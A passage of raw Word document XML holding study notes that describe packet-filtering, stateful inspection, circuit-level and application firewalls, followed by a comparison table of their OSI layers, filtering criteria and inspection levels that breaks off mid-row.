        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD4B1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Packet-Filtering Firewalls: Packet-filtering firewalls operate at the network layer (Layer 3) of the OSI model. They examine the headers of individual packets, such as source and destination IP addresses, port numbers, and protocol types, to make filtering decisions. These firewalls compare packet header information against a set of predefined rules or filters and either allow or deny the packet based on those rules. Packet-filtering firewalls are efficient and provide basic security, but they lack the ability to inspect packet content beyond the header information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52688368" w14:textId="77777777" w:rsidR="00CD4B1B" w:rsidRPr="00CD4B1B" w:rsidRDefault="00CD4B1B" w:rsidP="00CD4B1B">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD4B1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Stateful Inspection Firewalls: Stateful inspection firewalls combine packet filtering with the ability to track the state of network connections. These firewalls not only inspect packet headers but also keep track of the state and context of each network connection. They maintain a state table that records the status and details of each connection, allowing them to make more intelligent filtering decisions. Stateful inspection firewalls can determine if a packet is part of an established connection or a new connection attempt, providing better security and flexibility compared to packet-filtering firewalls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E861C6E" w14:textId="77777777" w:rsidR="00CD4B1B" w:rsidRPr="00CD4B1B" w:rsidRDefault="00CD4B1B" w:rsidP="00CD4B1B">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD4B1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Circuit-Level Firewalls: Circuit-level firewalls, also known as proxy firewalls, operate at the session layer (Layer 5) of the OSI model. These firewalls act as intermediaries between client and server connections. Instead of inspecting individual packets, circuit-level firewalls establish a separate connection with the client and another separate connection with the server. They act as a relay, monitoring the connection setup and tear-down process, and verifying that the connection is valid based on the firewall's security policy. Circuit-level firewalls can provide enhanced security by isolating internal networks from external connections and hiding internal IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADE5E2A" w14:textId="2BEDFE7D" w:rsidR="00CD4B1B" w:rsidRDefault="00CD4B1B" w:rsidP="00CD4B1B">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD4B1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Application Firewalls: Application firewalls operate at the application layer (Layer 7) of the OSI model. These firewalls analyze the contents of packets beyond just the header information. They inspect the payload or data within the packet and perform deep packet inspection to understand the application-layer protocols and detect potential threats or attacks specific to the application being used. Application firewalls are aware of the semantics of various protocols and can apply specific security rules or policies tailored to each application. They can protect against application-level vulnerabilities, such as SQL injection or cross-site scripting (XSS), providing a high level of security for specific applications or services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6448CCDC" w14:textId="57E810C0" w:rsidR="00512567" w:rsidRDefault="00512567" w:rsidP="00CD4B1B">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CD7871D" w14:textId="73675CEB" w:rsidR="00512567" w:rsidRDefault="00512567" w:rsidP="00CD4B1B">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F648719" w14:textId="2E9FC14B" w:rsidR="00512567" w:rsidRDefault="00512567" w:rsidP="00CD4B1B">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41C733B6" w14:textId="1217A250" w:rsidR="00512567" w:rsidRDefault="00512567" w:rsidP="00CD4B1B">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FBA9EB2" w14:textId="07C19D6C" w:rsidR="00512567" w:rsidRDefault="00512567" w:rsidP="00CD4B1B">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Answer in table form:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10170" w:type="dxa"/>
        <w:tblInd w:w="-545" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2415"/>
        <w:gridCol w:w="1870"/>
        <w:gridCol w:w="2015"/>
        <w:gridCol w:w="1890"/>
        <w:gridCol w:w="1980"/>
      </w:tblGrid>
      <w:tr w:rsidR="00512567" w14:paraId="70160167" w14:textId="77777777" w:rsidTr="001A20ED">
        <w:trPr>
          <w:trHeight w:val="602"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="593A7D60" w14:textId="77777777" w:rsidR="00512567" w:rsidRDefault="00512567" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33E8B47A" w14:textId="760050EC" w:rsidR="00512567" w:rsidRPr="00512567" w:rsidRDefault="00512567" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00512567">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="111827"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Packet-Filtering Firewalls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2015" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="016075AE" w14:textId="20AFB56A" w:rsidR="00512567" w:rsidRPr="00512567" w:rsidRDefault="00512567" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00512567">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="111827"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Stateful Inspection Firewalls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1890" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C8F4104" w14:textId="2979B375" w:rsidR="00512567" w:rsidRPr="00512567" w:rsidRDefault="00512567" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00512567">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="111827"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Circuit-Level Firewalls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4EBE281F" w14:textId="65335D33" w:rsidR="00512567" w:rsidRPr="00512567" w:rsidRDefault="00512567" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00512567">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="111827"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Application </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="111827"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00512567">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="111827"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Firewalls</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00512567" w14:paraId="6F597CC8" w14:textId="77777777" w:rsidTr="001A20ED">
        <w:trPr>
          <w:trHeight w:val="710"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1740CBF3" w14:textId="63B19271" w:rsidR="00512567" w:rsidRDefault="00512567" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>OSI Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2BDCE2C0" w14:textId="7FD95CD4" w:rsidR="00512567" w:rsidRDefault="00512567" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Network Layer </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>(Layer 3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2015" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53F39F70" w14:textId="5EA0DB10" w:rsidR="00512567" w:rsidRDefault="00512567" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Network Layer </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>(Layer 3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1890" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="443874A9" w14:textId="6036149D" w:rsidR="00512567" w:rsidRDefault="00512567" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Session</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Layer </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">(Layer </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44E06397" w14:textId="6B8BDF7D" w:rsidR="00512567" w:rsidRDefault="00512567" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Application Layer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>(Layer 7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00512567" w14:paraId="56AA883A" w14:textId="77777777" w:rsidTr="001A20ED">
        <w:trPr>
          <w:trHeight w:val="980"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5714F832" w14:textId="0890951D" w:rsidR="00512567" w:rsidRDefault="00512567" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Filtering Criteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A827399" w14:textId="797A8BE1" w:rsidR="00512567" w:rsidRDefault="00512567" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Packet headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2015" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5999A1D4" w14:textId="2904B5CF" w:rsidR="00512567" w:rsidRDefault="00512567" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Packet headers</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>and connection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1890" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75E21568" w14:textId="06AF8056" w:rsidR="00512567" w:rsidRDefault="00512567" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Connection setup</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>/tear-down</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D5C3D59" w14:textId="2C08F32C" w:rsidR="00512567" w:rsidRDefault="00512567" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Packet payloads</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>and application-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>layer protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00512567" w14:paraId="26132173" w14:textId="77777777" w:rsidTr="001A20ED">
        <w:trPr>
          <w:trHeight w:val="1250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6738ED83" w14:textId="42E7023A" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Level of Inspection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DFCAFA2" w14:textId="2BB046F1" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Limited (header</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>information)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2015" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31EA82B0" w14:textId="07DD85B4" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Moderate (header</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>and connection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>state)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1890" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CA4738E" w14:textId="53441981" w:rsidR="00512567" w:rsidRDefault="00837379" w:rsidP="00512567">
            <w:pPr>
              <w:ind w:right="-360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Moderate (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>connection setup/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>tear-down)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
